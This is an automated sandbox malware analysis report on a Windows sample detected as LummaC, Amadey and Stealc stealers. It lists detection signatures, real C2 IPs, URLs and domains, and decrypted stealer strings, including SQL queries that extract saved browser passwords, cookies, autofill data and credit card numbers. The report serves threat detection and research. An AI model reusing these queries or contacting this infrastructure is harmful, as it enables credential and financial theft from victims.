Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546571
MD5: 3ce8a084a0d153f38580f6df179b0be9
SHA1: 2c4756d7a989761b174cc79913ae4c37e19fff10
SHA256: af2230310bf32dde9403e6706e93e157a793c90b24db6907e77212b0ce557a4b
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000004.00000003.2288392617.00000000051F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 26.0.num.exe.860000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: file.exe.3440.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "navygenerayk.store", "necklacedmny.store", "scriptyprefej.store", "fadehairucw.store", "crisiwarny.store", "presticitpo.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe ReversingLabs: Detection: 36%
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 52% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 26.0.num.exe.860000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 26.0.num.exe.860000.0.unpack String decryptor: 30
Source: 26.0.num.exe.860000.0.unpack String decryptor: 11
Source: 26.0.num.exe.860000.0.unpack String decryptor: 20
Source: 26.0.num.exe.860000.0.unpack String decryptor: 24
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetProcAddress
Source: 26.0.num.exe.860000.0.unpack String decryptor: LoadLibraryA
Source: 26.0.num.exe.860000.0.unpack String decryptor: lstrcatA
Source: 26.0.num.exe.860000.0.unpack String decryptor: OpenEventA
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateEventA
Source: 26.0.num.exe.860000.0.unpack String decryptor: CloseHandle
Source: 26.0.num.exe.860000.0.unpack String decryptor: Sleep
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetUserDefaultLangID
Source: 26.0.num.exe.860000.0.unpack String decryptor: VirtualAllocExNuma
Source: 26.0.num.exe.860000.0.unpack String decryptor: VirtualFree
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetSystemInfo
Source: 26.0.num.exe.860000.0.unpack String decryptor: VirtualAlloc
Source: 26.0.num.exe.860000.0.unpack String decryptor: HeapAlloc
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetComputerNameA
Source: 26.0.num.exe.860000.0.unpack String decryptor: lstrcpyA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetProcessHeap
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetCurrentProcess
Source: 26.0.num.exe.860000.0.unpack String decryptor: lstrlenA
Source: 26.0.num.exe.860000.0.unpack String decryptor: ExitProcess
Source: 26.0.num.exe.860000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetSystemTime
Source: 26.0.num.exe.860000.0.unpack String decryptor: SystemTimeToFileTime
Source: 26.0.num.exe.860000.0.unpack String decryptor: advapi32.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: gdi32.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: user32.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: crypt32.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: ntdll.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetUserNameA
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateDCA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetDeviceCaps
Source: 26.0.num.exe.860000.0.unpack String decryptor: ReleaseDC
Source: 26.0.num.exe.860000.0.unpack String decryptor: CryptStringToBinaryA
Source: 26.0.num.exe.860000.0.unpack String decryptor: sscanf
Source: 26.0.num.exe.860000.0.unpack String decryptor: VMwareVMware
Source: 26.0.num.exe.860000.0.unpack String decryptor: HAL9TH
Source: 26.0.num.exe.860000.0.unpack String decryptor: JohnDoe
Source: 26.0.num.exe.860000.0.unpack String decryptor: DISPLAY
Source: 26.0.num.exe.860000.0.unpack String decryptor: %hu/%hu/%hu
Source: 26.0.num.exe.860000.0.unpack String decryptor: http://185.215.113.206
Source: 26.0.num.exe.860000.0.unpack String decryptor: bksvnsj
Source: 26.0.num.exe.860000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 26.0.num.exe.860000.0.unpack String decryptor: /746f34465cf17784/
Source: 26.0.num.exe.860000.0.unpack String decryptor: tale
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetFileAttributesA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GlobalLock
Source: 26.0.num.exe.860000.0.unpack String decryptor: HeapFree
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetFileSize
Source: 26.0.num.exe.860000.0.unpack String decryptor: GlobalSize
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 26.0.num.exe.860000.0.unpack String decryptor: IsWow64Process
Source: 26.0.num.exe.860000.0.unpack String decryptor: Process32Next
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetLocalTime
Source: 26.0.num.exe.860000.0.unpack String decryptor: FreeLibrary
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetTimeZoneInformation
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetSystemPowerStatus
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetVolumeInformationA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 26.0.num.exe.860000.0.unpack String decryptor: Process32First
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetLocaleInfoA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetModuleFileNameA
Source: 26.0.num.exe.860000.0.unpack String decryptor: DeleteFileA
Source: 26.0.num.exe.860000.0.unpack String decryptor: FindNextFileA
Source: 26.0.num.exe.860000.0.unpack String decryptor: LocalFree
Source: 26.0.num.exe.860000.0.unpack String decryptor: FindClose
Source: 26.0.num.exe.860000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 26.0.num.exe.860000.0.unpack String decryptor: LocalAlloc
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetFileSizeEx
Source: 26.0.num.exe.860000.0.unpack String decryptor: ReadFile
Source: 26.0.num.exe.860000.0.unpack String decryptor: SetFilePointer
Source: 26.0.num.exe.860000.0.unpack String decryptor: WriteFile
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateFileA
Source: 26.0.num.exe.860000.0.unpack String decryptor: FindFirstFileA
Source: 26.0.num.exe.860000.0.unpack String decryptor: CopyFileA
Source: 26.0.num.exe.860000.0.unpack String decryptor: VirtualProtect
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetLastError
Source: 26.0.num.exe.860000.0.unpack String decryptor: lstrcpynA
Source: 26.0.num.exe.860000.0.unpack String decryptor: MultiByteToWideChar
Source: 26.0.num.exe.860000.0.unpack String decryptor: GlobalFree
Source: 26.0.num.exe.860000.0.unpack String decryptor: WideCharToMultiByte
Source: 26.0.num.exe.860000.0.unpack String decryptor: GlobalAlloc
Source: 26.0.num.exe.860000.0.unpack String decryptor: OpenProcess
Source: 26.0.num.exe.860000.0.unpack String decryptor: TerminateProcess
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetCurrentProcessId
Source: 26.0.num.exe.860000.0.unpack String decryptor: gdiplus.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: ole32.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: bcrypt.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: wininet.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: shlwapi.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: shell32.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: psapi.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: rstrtmgr.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 26.0.num.exe.860000.0.unpack String decryptor: SelectObject
Source: 26.0.num.exe.860000.0.unpack String decryptor: BitBlt
Source: 26.0.num.exe.860000.0.unpack String decryptor: DeleteObject
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateCompatibleDC
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdipGetImageEncoders
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdiplusStartup
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdiplusShutdown
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdipSaveImageToStream
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdipDisposeImage
Source: 26.0.num.exe.860000.0.unpack String decryptor: GdipFree
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetHGlobalFromStream
Source: 26.0.num.exe.860000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 26.0.num.exe.860000.0.unpack String decryptor: CoUninitialize
Source: 26.0.num.exe.860000.0.unpack String decryptor: CoInitialize
Source: 26.0.num.exe.860000.0.unpack String decryptor: CoCreateInstance
Source: 26.0.num.exe.860000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 26.0.num.exe.860000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 26.0.num.exe.860000.0.unpack String decryptor: BCryptDecrypt
Source: 26.0.num.exe.860000.0.unpack String decryptor: BCryptSetProperty
Source: 26.0.num.exe.860000.0.unpack String decryptor: BCryptDestroyKey
Source: 26.0.num.exe.860000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetWindowRect
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetDesktopWindow
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetDC
Source: 26.0.num.exe.860000.0.unpack String decryptor: CloseWindow
Source: 26.0.num.exe.860000.0.unpack String decryptor: wsprintfA
Source: 26.0.num.exe.860000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 26.0.num.exe.860000.0.unpack String decryptor: CharToOemW
Source: 26.0.num.exe.860000.0.unpack String decryptor: wsprintfW
Source: 26.0.num.exe.860000.0.unpack String decryptor: RegQueryValueExA
Source: 26.0.num.exe.860000.0.unpack String decryptor: RegEnumKeyExA
Source: 26.0.num.exe.860000.0.unpack String decryptor: RegOpenKeyExA
Source: 26.0.num.exe.860000.0.unpack String decryptor: RegCloseKey
Source: 26.0.num.exe.860000.0.unpack String decryptor: RegEnumValueA
Source: 26.0.num.exe.860000.0.unpack String decryptor: CryptBinaryToStringA
Source: 26.0.num.exe.860000.0.unpack String decryptor: CryptUnprotectData
Source: 26.0.num.exe.860000.0.unpack String decryptor: SHGetFolderPathA
Source: 26.0.num.exe.860000.0.unpack String decryptor: ShellExecuteExA
Source: 26.0.num.exe.860000.0.unpack String decryptor: InternetOpenUrlA
Source: 26.0.num.exe.860000.0.unpack String decryptor: InternetConnectA
Source: 26.0.num.exe.860000.0.unpack String decryptor: InternetCloseHandle
Source: 26.0.num.exe.860000.0.unpack String decryptor: InternetOpenA
Source: 26.0.num.exe.860000.0.unpack String decryptor: HttpSendRequestA
Source: 26.0.num.exe.860000.0.unpack String decryptor: HttpOpenRequestA
Source: 26.0.num.exe.860000.0.unpack String decryptor: InternetReadFile
Source: 26.0.num.exe.860000.0.unpack String decryptor: InternetCrackUrlA
Source: 26.0.num.exe.860000.0.unpack String decryptor: StrCmpCA
Source: 26.0.num.exe.860000.0.unpack String decryptor: StrStrA
Source: 26.0.num.exe.860000.0.unpack String decryptor: StrCmpCW
Source: 26.0.num.exe.860000.0.unpack String decryptor: PathMatchSpecA
Source: 26.0.num.exe.860000.0.unpack String decryptor: GetModuleFileNameExA
Source: 26.0.num.exe.860000.0.unpack String decryptor: RmStartSession
Source: 26.0.num.exe.860000.0.unpack String decryptor: RmRegisterResources
Source: 26.0.num.exe.860000.0.unpack String decryptor: RmGetList
Source: 26.0.num.exe.860000.0.unpack String decryptor: RmEndSession
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_open
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_step
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_column_text
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_finalize
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_close
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_column_bytes
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3_column_blob
Source: 26.0.num.exe.860000.0.unpack String decryptor: encrypted_key
Source: 26.0.num.exe.860000.0.unpack String decryptor: PATH
Source: 26.0.num.exe.860000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: NSS_Init
Source: 26.0.num.exe.860000.0.unpack String decryptor: NSS_Shutdown
Source: 26.0.num.exe.860000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 26.0.num.exe.860000.0.unpack String decryptor: PK11_FreeSlot
Source: 26.0.num.exe.860000.0.unpack String decryptor: PK11_Authenticate
Source: 26.0.num.exe.860000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 26.0.num.exe.860000.0.unpack String decryptor: C:\ProgramData\
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 26.0.num.exe.860000.0.unpack String decryptor: browser:
Source: 26.0.num.exe.860000.0.unpack String decryptor: profile:
Source: 26.0.num.exe.860000.0.unpack String decryptor: url:
Source: 26.0.num.exe.860000.0.unpack String decryptor: login:
Source: 26.0.num.exe.860000.0.unpack String decryptor: password:
Source: 26.0.num.exe.860000.0.unpack String decryptor: Opera
Source: 26.0.num.exe.860000.0.unpack String decryptor: OperaGX
Source: 26.0.num.exe.860000.0.unpack String decryptor: Network
Source: 26.0.num.exe.860000.0.unpack String decryptor: cookies
Source: 26.0.num.exe.860000.0.unpack String decryptor: .txt
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 26.0.num.exe.860000.0.unpack String decryptor: TRUE
Source: 26.0.num.exe.860000.0.unpack String decryptor: FALSE
Source: 26.0.num.exe.860000.0.unpack String decryptor: autofill
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 26.0.num.exe.860000.0.unpack String decryptor: history
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 26.0.num.exe.860000.0.unpack String decryptor: cc
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 26.0.num.exe.860000.0.unpack String decryptor: name:
Source: 26.0.num.exe.860000.0.unpack String decryptor: month:
Source: 26.0.num.exe.860000.0.unpack String decryptor: year:
Source: 26.0.num.exe.860000.0.unpack String decryptor: card:
Source: 26.0.num.exe.860000.0.unpack String decryptor: Cookies
Source: 26.0.num.exe.860000.0.unpack String decryptor: Login Data
Source: 26.0.num.exe.860000.0.unpack String decryptor: Web Data
Source: 26.0.num.exe.860000.0.unpack String decryptor: History
Source: 26.0.num.exe.860000.0.unpack String decryptor: logins.json
Source: 26.0.num.exe.860000.0.unpack String decryptor: formSubmitURL
Source: 26.0.num.exe.860000.0.unpack String decryptor: usernameField
Source: 26.0.num.exe.860000.0.unpack String decryptor: encryptedUsername
Source: 26.0.num.exe.860000.0.unpack String decryptor: encryptedPassword
Source: 26.0.num.exe.860000.0.unpack String decryptor: guid
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 26.0.num.exe.860000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 26.0.num.exe.860000.0.unpack String decryptor: cookies.sqlite
Source: 26.0.num.exe.860000.0.unpack String decryptor: formhistory.sqlite
Source: 26.0.num.exe.860000.0.unpack String decryptor: places.sqlite
Source: 26.0.num.exe.860000.0.unpack String decryptor: plugins
Source: 26.0.num.exe.860000.0.unpack String decryptor: Local Extension Settings
Source: 26.0.num.exe.860000.0.unpack String decryptor: Sync Extension Settings
Source: 26.0.num.exe.860000.0.unpack String decryptor: IndexedDB
Source: 26.0.num.exe.860000.0.unpack String decryptor: Opera Stable
Source: 26.0.num.exe.860000.0.unpack String decryptor: Opera GX Stable
Source: 26.0.num.exe.860000.0.unpack String decryptor: CURRENT
Source: 26.0.num.exe.860000.0.unpack String decryptor: chrome-extension_
Source: 26.0.num.exe.860000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 26.0.num.exe.860000.0.unpack String decryptor: Local State
Source: 26.0.num.exe.860000.0.unpack String decryptor: profiles.ini
Source: 26.0.num.exe.860000.0.unpack String decryptor: chrome
Source: 26.0.num.exe.860000.0.unpack String decryptor: opera
Source: 26.0.num.exe.860000.0.unpack String decryptor: firefox
Source: 26.0.num.exe.860000.0.unpack String decryptor: wallets
Source: 26.0.num.exe.860000.0.unpack String decryptor: %08lX%04lX%lu
Source: 26.0.num.exe.860000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 26.0.num.exe.860000.0.unpack String decryptor: ProductName
Source: 26.0.num.exe.860000.0.unpack String decryptor: x32
Source: 26.0.num.exe.860000.0.unpack String decryptor: x64
Source: 26.0.num.exe.860000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 26.0.num.exe.860000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 26.0.num.exe.860000.0.unpack String decryptor: ProcessorNameString
Source: 26.0.num.exe.860000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 26.0.num.exe.860000.0.unpack String decryptor: DisplayName
Source: 26.0.num.exe.860000.0.unpack String decryptor: DisplayVersion
Source: 26.0.num.exe.860000.0.unpack String decryptor: Network Info:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - IP: IP?
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Country: ISO?
Source: 26.0.num.exe.860000.0.unpack String decryptor: System Summary:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - HWID:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - OS:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Architecture:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - UserName:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Computer Name:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Local Time:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - UTC:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Language:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Keyboards:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Laptop:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Running Path:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - CPU:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Threads:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Cores:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - RAM:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - Display Resolution:
Source: 26.0.num.exe.860000.0.unpack String decryptor: - GPU:
Source: 26.0.num.exe.860000.0.unpack String decryptor: User Agents:
Source: 26.0.num.exe.860000.0.unpack String decryptor: Installed Apps:
Source: 26.0.num.exe.860000.0.unpack String decryptor: All Users:
Source: 26.0.num.exe.860000.0.unpack String decryptor: Current User:
Source: 26.0.num.exe.860000.0.unpack String decryptor: Process List:
Source: 26.0.num.exe.860000.0.unpack String decryptor: system_info.txt
Source: 26.0.num.exe.860000.0.unpack String decryptor: freebl3.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: mozglue.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: msvcp140.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: nss3.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: softokn3.dll
